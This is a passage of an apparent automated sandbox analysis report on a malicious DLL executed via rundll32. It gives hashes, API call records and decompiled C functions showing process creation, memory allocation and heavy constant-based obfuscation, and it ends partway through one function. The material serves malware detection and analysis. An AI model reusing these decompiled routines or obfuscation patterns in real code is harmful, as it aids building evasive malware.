                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 18679c-186863 call 17cf25 call 172d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0018679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t40;
                                                                                                                      				int _t46;
                                                                                                                      				WCHAR* _t50;
                                                                                                                      
                                                                                                                      				_push(_a64);
                                                                                                                      				_t50 = __ecx;
                                                                                                                      				_push(_a60);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a48);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t40);
                                                                                                                      				_v24 = 0x639852;
                                                                                                                      				_v20 = 0;
                                                                                                                      				_v12 = 0x9647c4;
                                                                                                                      				_v12 = _v12 + 0x4343;
                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                      				_v12 = _v12 ^ 0x0009af77;
                                                                                                                      				_v16 = 0x17e0ca;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x000f0fb4;
                                                                                                                      				_v8 = 0x429f7b;
                                                                                                                      				_v8 = _v8 + 0xffff27c2;
                                                                                                                      				_v8 = _v8 + 0xb08b;
                                                                                                                      				_v8 = _v8 ^ 0x004b6691;
                                                                                                                      				E00172D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
                                                                                                                      				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
                                                                                                                      				return _t46;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0018685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 1fbc013cce900f83cd7f02ff89593b2fb50865d303712af86dc0cbb892a35df3
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 7921E772900248BBCF119F95CD09CDFBFB9EF99714F008148FA1466120D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 277 183cbb-183d40 call 172d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00183CBB() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _t37;
                                                                                                                      
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0x868838;
                                                                                                                      				_v16 = 0xb6c7ac;
                                                                                                                      				_t37 = 0x79;
                                                                                                                      				_v16 = _v16 * 0x7d;
                                                                                                                      				_v16 = _v16 ^ 0x593c5b8b;
                                                                                                                      				_v8 = 0x23929;
                                                                                                                      				_v8 = _v8 | 0xd856564b;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 >> 1;
                                                                                                                      				_v8 = _v8 ^ 0x67f2afdd;
                                                                                                                      				_v12 = 0x42ac5b;
                                                                                                                      				_v12 = _v12 / _t37;
                                                                                                                      				_v12 = _v12 ^ 0x0009f0c4;
                                                                                                                      				E00172D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 00183D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: bfec132e8b7bbdc7a81c8ec8f414b8f82c45aa194c2022f6f35eb856e3456179
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: DE0104B6D0120CFFDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 297 18fc96-18fd28 call 17cf25 call 172d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0018FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t40;
                                                                                                                      				signed int _t42;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0017CF25(_t32);
                                                                                                                      				_v8 = 0x178fa1;
                                                                                                                      				_v8 = _v8 | 0x2f4d5c19;
                                                                                                                      				_v8 = _v8 + 0xda24;
                                                                                                                      				_t42 = 0x35;
                                                                                                                      				_v8 = _v8 / _t42;
                                                                                                                      				_v8 = _v8 ^ 0x00e923af;
                                                                                                                      				_v16 = 0xca5f26;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x97c71065;
                                                                                                                      				_v12 = 0xeb54f5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x0000b8cd;
                                                                                                                      				E00172D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
                                                                                                                      				_t40 = lstrcmpiW(_a12, _a4); // executed
                                                                                                                      				return _t40;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 0018FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 5702fcddfe6dbf1435a8f9a093ec883ea065da46d073c2e56d9ef034c1f7e333
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 7701D376D00208BFDF05EFE4CD4A89EBBB6EB54304F10C098E9196A250DBB69B64DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00191B54() {
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v48;
                                                                                                                      				char _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v72;
                                                                                                                      				intOrPtr _v76;
                                                                                                                      				char _v84;
                                                                                                                      				char _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				char _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				intOrPtr _v120;
                                                                                                                      				char _v128;
                                                                                                                      				char _v136;
                                                                                                                      				char _v140;
                                                                                                                      				char _v144;
                                                                                                                      				char _v148;
                                                                                                                      				char _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				unsigned int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				unsigned int _v216;
                                                                                                                      				unsigned int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				unsigned int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				signed int _v432;
                                                                                                                      				signed int _v436;
                                                                                                                      				signed int _v440;
                                                                                                                      				signed int _v444;
                                                                                                                      				signed int _v448;
                                                                                                                      				signed int _v452;
                                                                                                                      				signed int _v456;
                                                                                                                      				signed int _v460;
                                                                                                                      				signed int _v464;
                                                                                                                      				signed int _v468;
                                                                                                                      				unsigned int _v472;
                                                                                                                      				signed int _v476;
                                                                                                                      				signed int _v480;
                                                                                                                      				signed int _v484;
                                                                                                                      				signed int _v488;
                                                                                                                      				signed int _v492;
                                                                                                                      				signed int _v496;
                                                                                                                      				signed int _v500;
                                                                                                                      				unsigned int _v504;
                                                                                                                      				signed int _v508;
                                                                                                                      				signed int _v512;
                                                                                                                      				signed int _v516;
                                                                                                                      				signed int _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				unsigned int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				unsigned int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _t1099;
                                                                                                                      				signed int _t1109;
                                                                                                                      				void* _t1121;
                                                                                                                      				signed int _t1139;
                                                                                                                      				signed int _t1147;
                                                                                                                      				signed int _t1167;
                                                                                                                      				void* _t1171;
                                                                                                                      				signed int _t1172;
                                                                                                                      				signed int _t1173;
                                                                                                                      				signed int _t1174;
                                                                                                                      				signed int _t1175;
                                                                                                                      				signed int _t1176;
                                                                                                                      				signed int _t1177;
                                                                                                                      				signed int _t1178;
                                                                                                                      				signed int _t1179;
                                                                                                                      				signed int _t1180;
                                                                                                                      				signed int _t1181;
                                                                                                                      				signed int _t1182;
                                                                                                                      				signed int _t1183;
                                                                                                                      				signed int _t1184;
                                                                                                                      				signed int _t1185;
                                                                                                                      				signed int _t1186;
                                                                                                                      				signed int _t1187;
                                                                                                                      				signed int _t1272;
                                                                                                                      				signed int _t1273;
                                                                                                                      				signed int _t1279;
                                                                                                                      				void* _t1281;
                                                                                                                      				signed int _t1288;
                                                                                                                      				signed int _t1309;
                                                                                                                      				void* _t1311;
                                                                                                                      				void* _t1314;
                                                                                                                      				void* _t1315;
                                                                                                                      				void* _t1316;
                                                                                                                      
                                                                                                                      				_t1311 = (_t1309 & 0xfffffff8) - 0x250;
                                                                                                                      				_v116 = _v116 & 0x00000000;
                                                                                                                      				_v120 = 0xa23e30;
                                                                                                                      				_v592 = 0x3a1cca;
                                                                                                                      				_v592 = _v592 * 0x70;
                                                                                                                      				_t1281 = 0x5cbbc19;
                                                                                                                      				_v592 = _v592 ^ 0x2f3849e0;
                                                                                                                      				_t9 =  &_v592; // 0x2f3849e0
                                                                                                                      				_t1172 = 6;
                                                                                                                      				_v592 =  *_t9 / _t1172;
                                                                                                                      				_v592 = _v592 ^ 0x090e23e8;
                                                                                                                      				_v236 = 0x87b10f;
                                                                                                                      				_v236 = _v236 << 0x10;
                                                                                                                      				_v236 = _v236 ^ 0xb10f0000;
                                                                                                                      				_v516 = 0x461834;
                                                                                                                      				_v516 = _v516 ^ 0x02f635e2;
                                                                                                                      				_t1173 = 0x21;
                                                                                                                      				_v516 = _v516 / _t1173;
                                                                                                                      				_v516 = _v516 | 0x474321ea;
                                                                                                                      				_v516 = _v516 ^ 0x4757fbfb;
                                                                                                                      				_v216 = 0xd2c0b1;
                                                                                                                      				_v216 = _v216 >> 1;
                                                                                                                      				_v216 = _v216 ^ 0x006de7f5;
                                                                                                                      				_v480 = 0xeb5e0b;
                                                                                                                      				_v480 = _v480 + 0xffffa941;
                                                                                                                      				_t1272 = 0x43;
                                                                                                                      				_v480 = _v480 / _t1272;
                                                                                                                      				_v480 = _v480 | 0xc166e67d;
                                                                                                                      				_v480 = _v480 ^ 0xc1675dee;
                                                                                                                      				_v488 = 0xe6f87d;
                                                                                                                      				_v488 = _v488 ^ 0x80ff234c;
                                                                                                                      				_v488 = _v488 ^ 0x24b1b453;
                                                                                                                      				_v488 = _v488 + 0xa7fe;
                                                                                                                      				_v488 = _v488 ^ 0xa4a91779;
                                                                                                                      				_v276 = 0x5f17b9;
                                                                                                                      				_v276 = _v276 << 3;
                                                                                                                      				_v276 = _v276 ^ 0x02fd9db5;
                                                                                                                      				_v344 = 0x4c006c;
                                                                                                                      				_v344 = _v344 >> 0xe;
                                                                                                                      				_v344 = _v344 | 0xcdf796ee;
                                                                                                                      				_v344 = _v344 ^ 0xcdf61224;
                                                                                                                      				_v200 = 0x45df15;
                                                                                                                      				_v200 = _v200 + 0x6060;
                                                                                                                      				_v200 = _v200 ^ 0x004b7917;
                                                                                                                      				_v208 = 0xca7f26;
                                                                                                                      				_v208 = _v208 ^ 0x913d6520;
                                                                                                                      				_v208 = _v208 ^ 0x91fcdbd5;
                                                                                                                      				_v588 = 0xb1f4cb;
                                                                                                                      				_v588 = _v588 + 0x6758;
                                                                                                                      				_t87 =  &_v588; // 0x6758
                                                                                                                      				_v588 =  *_t87 * 0x4f;
                                                                                                                      				_v588 = _v588 ^ 0x925d082a;
                                                                                                                      				_v588 = _v588 ^ 0xa5589431;
                                                                                                                      				_v508 = 0xf7df1e;
                                                                                                                      				_v508 = _v508 + 0xd118;
                                                                                                                      				_v508 = _v508 + 0xffffbf54;
                                                                                                                      				_v508 = _v508 + 0x17fc;
                                                                                                                      				_v508 = _v508 ^ 0x00fe0a31;
                                                                                                                      				_v380 = 0x7e02fb;
                                                                                                                      				_v380 = _v380 + 0xf589;
                                                                                                                      				_v380 = _v380 ^ 0x91d98710;
                                                                                                                      				_v380 = _v380 ^ 0x91abdaf6;
                                                                                                                      				_v504 = 0xb08a0e;
                                                                                                                      				_v504 = _v504 * 0x77;
                                                                                                                      				_t1174 = 0x77;
                                                                                                                      				_v504 = _v504 / _t1174;
                                                                                                                      				_v504 = _v504 >> 2;
                                                                                                                      				_v504 = _v504 ^ 0x002dfbde;
                                                                                                                      				_v372 = 0x813d4a;
                                                                                                                      				_t1175 = 0x6c;
                                                                                                                      				_v372 = _v372 * 0x4a;
                                                                                                                      				_v372 = _v372 / _t1175;
                                                                                                                      				_v372 = _v372 ^ 0x005da134;
                                                                                                                      				_v484 = 0x855e16;
                                                                                                                      				_v484 = _v484 ^ 0xbfb8346c;
                                                                                                                      				_t1176 = 0x5f;
                                                                                                                      				_v484 = _v484 / _t1176;
                                                                                                                      				_v484 = _v484 + 0xfcf8;
                                                                                                                      				_v484 = _v484 ^ 0x02037e81;
                                                                                                                      				_v240 = 0xec674d;
                                                                                                                      				_v240 = _v240 | 0xfc3e6c49;
                                                                                                                      				_v240 = _v240 ^ 0xfcfddb47;
                                                                                                                      				_v364 = 0x61d0f9;
                                                                                                                      				_v364 = _v364 + 0xffffb344;
                                                                                                                      				_v364 = _v364 / _t1272;
                                                                                                                      				_v364 = _v364 ^ 0x000105b5;
                                                                                                                      				_v472 = 0x31ce7b;
                                                                                                                      				_t1177 = 0x51;
                                                                                                                      				_v472 = _v472 * 0x26;
                                                                                                                      				_v472 = _v472 >> 0xc;
                                                                                                                      				_v472 = _v472 >> 3;
                                                                                                                      				_v472 = _v472 ^ 0x0004fff0;
                                                                                                                      				_v224 = 0x9583f6;
                                                                                                                      				_v224 = _v224 / _t1177;
                                                                                                                      				_v224 = _v224 ^ 0x000db43c;
                                                                                                                      				_v324 = 0x1fdef9;
                                                                                                                      				_v324 = _v324 ^ 0xa62571f8;
                                                                                                                      				_v324 = _v324 ^ 0x1b5a0dd0;
                                                                                                                      				_v324 = _v324 ^ 0xbd66a263;
                                                                                                                      				_v232 = 0xd74a0b;
                                                                                                                      				_v232 = _v232 >> 6;
                                                                                                                      				_v232 = _v232 ^ 0x0003c3e3;
                                                                                                                      				_v376 = 0x9dde1e;
                                                                                                                      				_v376 = _v376 << 4;
                                                                                                                      				_v376 = _v376 + 0x9dbb;
                                                                                                                      				_v376 = _v376 ^ 0x09d67643;
                                                                                                                      				_v172 = 0x65dbd5;
                                                                                                                      				_v172 = _v172 >> 0xf;
                                                                                                                      				_v172 = _v172 ^ 0x000c80e9;
                                                                                                                      				_v400 = 0x3c4de1;
                                                                                                                      				_v400 = _v400 ^ 0xf2f914cc;
                                                                                                                      				_t1178 = 0x12;
                                                                                                                      				_v400 = _v400 / _t1178;
                                                                                                                      				_v400 = _v400 ^ 0x0d7ab358;
                                                                                                                      				_v312 = 0x3bea2f;
                                                                                                                      				_t216 =  &_v312; // 0x3bea2f
                                                                                                                      				_t1167 = 0xc;
                                                                                                                      				_v312 =  *_t216 / _t1167;
                                                                                                                      				_v312 = _v312 + 0xffff5e93;
                                                                                                                      				_v312 = _v312 ^ 0x000042d8;
                                                                                                                      				_v392 = 0x83f9ee;
                                                                                                                      				_v392 = _v392 >> 0xb;
                                                                                                                      				_v392 = _v392 * 0x24;
                                                                                                                      				_v392 = _v392 ^ 0x00021c0f;
                                                                                                                      				_v500 = 0x95bd51;
                                                                                                                      				_v500 = _v500 ^ 0x1620baa4;
                                                                                                                      				_v500 = _v500 | 0xd04cbe8c;
                                                                                                                      				_v500 = _v500 * 0x26;
                                                                                                                      				_v500 = _v500 ^ 0xe9af68de;
                                                                                                                      				_v548 = 0x57ee13;
                                                                                                                      				_v548 = _v548 | 0xcfcc72ac;
                                                                                                                      				_v548 = _v548 << 0xe;
                                                                                                                      				_v548 = _v548 + 0x6b2a;
                                                                                                                      				_v548 = _v548 ^ 0xffb12270;
                                                                                                                      				_v300 = 0xa3111e;
                                                                                                                      				_v300 = _v300 + 0xed59;
                                                                                                                      				_v300 = _v300 | 0xdcd78075;
                                                                                                                      				_v300 = _v300 ^ 0xdcf05604;
                                                                                                                      				_v432 = 0xce194f;
                                                                                                                      				_v432 = _v432 ^ 0x23730281;
                                                                                                                      				_v432 = _v432 ^ 0x3635ea1c;
                                                                                                                      				_v432 = _v432 + 0x939b;
                                                                                                                      				_v432 = _v432 ^ 0x1587da76;
                                                                                                                      				_v288 = 0x2cf49d;
                                                                                                                      				_v288 = _v288 << 3;
                                                                                                                      				_v288 = _v288 ^ 0x016df807;
                                                                                                                      				_v584 = 0x20f3bb;
                                                                                                                      				_v584 = _v584 ^ 0x1d2fae62;
                                                                                                                      				_v584 = _v584 ^ 0x98b788a9;
                                                                                                                      				_v584 = _v584 >> 4;
                                                                                                                      				_v584 = _v584 ^ 0x0858582d;
                                                                                                                      				_v464 = 0xcbd192;
                                                                                                                      				_v464 = _v464 * 0x21;
                                                                                                                      				_v464 = _v464 + 0xffff109b;
                                                                                                                      				_v464 = _v464 | 0xd92be105;
                                                                                                                      				_v464 = _v464 ^ 0xdb61e2c2;
                                                                                                                      				_v256 = 0x6d4d8e;
                                                                                                                      				_v256 = _v256 ^ 0x2793e4ee;
                                                                                                                      				_v256 = _v256 ^ 0x27fc61d0;
                                                                                                                      				_v264 = 0x15e89c;
                                                                                                                      				_v264 = _v264 * 0x43;
                                                                                                                      				_v264 = _v264 ^ 0x05baa293;
                                                                                                                      				_v568 = 0x46d03d;
                                                                                                                      				_v568 = _v568 + 0xffffbff8;
                                                                                                                      				_v568 = _v568 << 2;
                                                                                                                      				_v568 = _v568 + 0xffff0322;
                                                                                                                      				_v568 = _v568 ^ 0x011861cf;
                                                                                                                      				_v576 = 0x876e5a;
                                                                                                                      				_v576 = _v576 >> 0x10;
                                                                                                                      				_v576 = _v576 << 2;
                                                                                                                      				_v576 = _v576 << 0xa;
                                                                                                                      				_v576 = _v576 ^ 0x000133c4;
                                                                                                                      				_v552 = 0xa4c770;
                                                                                                                      				_v552 = _v552 + 0x64e6;
                                                                                                                      				_v552 = _v552 + 0xffff80c6;
                                                                                                                      				_v552 = _v552 << 2;
                                                                                                                      				_v552 = _v552 ^ 0x029c8e96;
                                                                                                                      				_v560 = 0x48961c;
                                                                                                                      				_v560 = _v560 * 0x1d;
                                                                                                                      				_v560 = _v560 * 0x3a;
                                                                                                                      				_v560 = _v560 + 0x764e;
                                                                                                                      				_v560 = _v560 ^ 0xdceaabba;
                                                                                                                      				_v412 = 0x2483ba;
                                                                                                                      				_v412 = _v412 * 0x74;
                                                                                                                      				_v412 = _v412 >> 0xa;
                                                                                                                      				_v412 = _v412 ^ 0x000035b1;
                                                                                                                      				_v416 = 0x4a6b09;
                                                                                                                      				_v416 = _v416 >> 8;
                                                                                                                      				_v416 = _v416 * 0x64;
                                                                                                                      				_v416 = _v416 ^ 0x001bf6ce;
                                                                                                                      				_v544 = 0x85ae90;
                                                                                                                      				_v544 = _v544 + 0xffff7005;
                                                                                                                      				_v544 = _v544 + 0x7ae9;
                                                                                                                      				_t1179 = 0x70;
                                                                                                                      				_v544 = _v544 * 0x32;
                                                                                                                      				_v544 = _v544 ^ 0x1a1ce9dc;
                                                                                                                      				_v396 = 0x6298d9;
                                                                                                                      				_v396 = _v396 | 0x50e275a2;
                                                                                                                      				_v396 = _v396 ^ 0x271fbe87;
                                                                                                                      				_v396 = _v396 ^ 0x77f03e33;
                                                                                                                      				_v404 = 0x9d84c7;
                                                                                                                      				_v404 = _v404 ^ 0x3ba1d94b;
                                                                                                                      				_v404 = _v404 | 0x0d5acb53;
                                                                                                                      				_v404 = _v404 ^ 0x3f764d37;
